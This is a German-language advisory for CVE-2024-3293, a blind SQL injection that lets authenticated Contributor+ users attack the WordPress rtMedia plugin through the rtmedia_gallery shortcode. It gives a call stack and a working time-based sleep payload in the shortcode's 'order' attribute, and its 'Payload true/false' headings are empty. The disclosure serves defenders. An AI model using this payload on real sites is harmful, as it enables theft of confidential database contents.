
CVE-2024-3293 rtMedia für WordPress, BuddyPress und bbPress <= 4.6.18 - Authentifizierte (Contributor+) SQL-Injection über den rtmedia_gallery Shortcode
rtMedia für WordPress, BuddyPress und bbPress <= 4.6.18 - Authentifizierte (Contributor+) SQL-Injection über rtmedia_gallery Shortcode
Beschreibung
Das rtMedia für WordPress, BuddyPress und bbPress Plugin für WordPress ist in allen Versionen bis einschließlich 4.6.18 anfällig für blinde SQL-Injection über den rtmedia_gallery Shortcode, da der vom Benutzer bereitgestellte Parameter unzureichend maskiert (escaped) wird und die bestehende SQL-Abfrage nicht ausreichend vorbereitet wird. Dies ermöglicht es authentifizierten Angreifern mit Contributor-Zugriff oder höher, zusätzliche SQL-Abfragen an bereits bestehende Abfragen anzuhängen, die dazu verwendet werden können, vertrauliche Informationen aus der Datenbank zu extrahieren.
AUFRUFSTAPEL
RTMediaModel->get (\buddypress-media\app\helper\RTMediaModel.php:61)
RTMediaModel->get_media (\buddypress-media\app\helper\RTMediaModel.php:227)
RTMediaQuery->populate_media (\buddypress-media\app\main\routers\query\RTMediaQuery.php:869)
RTMediaQuery->populate_data (\buddypress-media\app\main\routers\query\RTMediaQuery.php:993)
RTMediaQuery->get_data (\buddypress-media\app\main\routers\query\RTMediaQuery.php:1214)
RTMediaQuery->query (\buddypress-media\app\main\routers\query\RTMediaQuery.php:684)
RTMediaQuery->__construct (\buddypress-media\app\main\routers\query\RTMediaQuery.php:184)
RTMediaGalleryShortcode::render (\buddypress-media\app\main\controllers\shortcodes\RTMediaGalleryShortcode.php:271)
Payload:
[rtmedia_gallery global="true" album_id="57" order_by="ratings" order=",media_id,(select 1 from (select sleep(IF(1=1,5,0)))x)"]


Payload true:

Payload false:
